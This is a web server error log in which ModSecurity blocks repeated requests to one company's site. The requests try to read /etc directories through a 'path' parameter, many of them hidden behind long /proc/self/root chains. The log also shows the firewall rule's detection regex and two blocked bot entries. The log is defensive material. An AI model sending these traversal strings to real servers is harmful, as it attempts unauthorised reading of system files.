[Wed Mar 18 04:06:09.431029 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:46472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO4ew_le52K8_3pV2hOgAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:06:11.593139 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:44276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO4uoXxyEfFpUF8f8upAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:06:13.005845 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:44278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO5eyqAr6etmhZHNp6dwAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:06:15.301016 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:44286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO59Y0UrI5A3LftIxT9QAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:06:26.179011 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:44294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO8OoXxyEfFpUF8f8urwAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:06:27.885940 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:39634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO8-yqAr6etmhZHNp6eAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:06:31.933106 2026] [:error] [pid 17887:tid 140411624429312] [client 216.73.216.191:50880] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO9wkwaGbbGflqUZDT5AAAAM4"]
[Wed Mar 18 04:06:32.631425 2026] [:error] [pid 30077:tid 140411616036608] [client 216.73.216.191:50932] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpO-Pu8EFLIOrSqIpvHtwAAAk8"]
[Wed Mar 18 04:06:59.717816 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.244.43:50298] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpPE8df6f5d65gmYZSSEQAAAs8"]
[Wed Mar 18 04:07:02.462769 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.228.61:38404] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpPFtY0UrI5A3LftIxUBAAAAZc"]
[Wed Mar 18 04:07:04.159925 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.241.31:53606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPGCmAPhZkrhU8w4kvfwAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:07:30.940504 2026] [:error] [pid 11816:tid 140411548894976] [client 216.73.216.191:52118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPMuw_le52K8_3pV2hWwAAAhc"]
[Wed Mar 18 04:07:32.295354 2026] [:error] [pid 29882:tid 140411716749056] [client 216.73.216.191:52206] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPNEzinOy1jxa1j4fUDgAAAQM"]
[Wed Mar 18 04:07:32.598014 2026] [:error] [pid 17653:tid 140411616036608] [client 216.73.216.191:52224] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPNMdf6f5d65gmYZSSHwAAAs8"]
[Wed Mar 18 04:07:41.155250 2026] [:error] [pid 31803:tid 140411548894976] [client 216.73.216.191:52584] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPPeyqAr6etmhZHNp6pQAAAFc"]
[Wed Mar 18 04:07:41.756049 2026] [:error] [pid 30077:tid 140411599251200] [client 216.73.216.191:52626] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPPfu8EFLIOrSqIpvH1QAAAlE"]
[Wed Mar 18 04:07:42.160344 2026] [:error] [pid 31803:tid 140411641214720] [client 216.73.216.191:52648] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPPuyqAr6etmhZHNp6rQAAAEw"]
[Wed Mar 18 04:07:43.655420 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:39644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPPgkwaGbbGflqUZDUKQAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:08:09.224741 2026] [:error] [pid 30077:tid 140411540502272] [client 216.73.216.191:53238] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPWfu8EFLIOrSqIpvH3wAAAlg"]
[Wed Mar 18 04:08:09.636351 2026] [:error] [pid 19507:tid 140411590858496] [client 216.73.216.191:53266] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPWdY0UrI5A3LftIxUKwAAAZI"]
[Wed Mar 18 04:08:09.952290 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:37174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPWeoXxyEfFpUF8f8u_QAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:08:10.346919 2026] [:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:53306] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPWta6ubjKNq_cu4ZX5wAAA0Q"]
[Wed Mar 18 04:08:12.971257 2026] [:error] [pid 15051:tid 140411691570944] [client 216.73.216.191:53420] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPXCmAPhZkrhU8w4kvoAAAAIY"]
[Wed Mar 18 04:08:12.984622 2026] [:error] [pid 29882:tid 140411674785536] [client 216.73.216.191:53396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPW0zinOy1jxa1j4fUIgAAAQg"]
[Wed Mar 18 04:08:14.572113 2026] [:error] [pid 29882:tid 140411708356352] [client 216.73.216.191:53504] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPXkzinOy1jxa1j4fUJgAAAQQ"]
[Wed Mar 18 04:08:14.795209 2026] [:error] [pid 31803:tid 140411582465792] [client 216.73.216.191:53514] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPXuyqAr6etmhZHNp6zQAAAFM"]
[Wed Mar 18 04:08:20.054186 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:34828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPZPu8EFLIOrSqIpvH7QAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:08:38.996208 2026] [:error] [pid 11816:tid 140411590858496] [client 216.73.216.191:54042] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpPduw_le52K8_3pV2hjAAAAhI"]
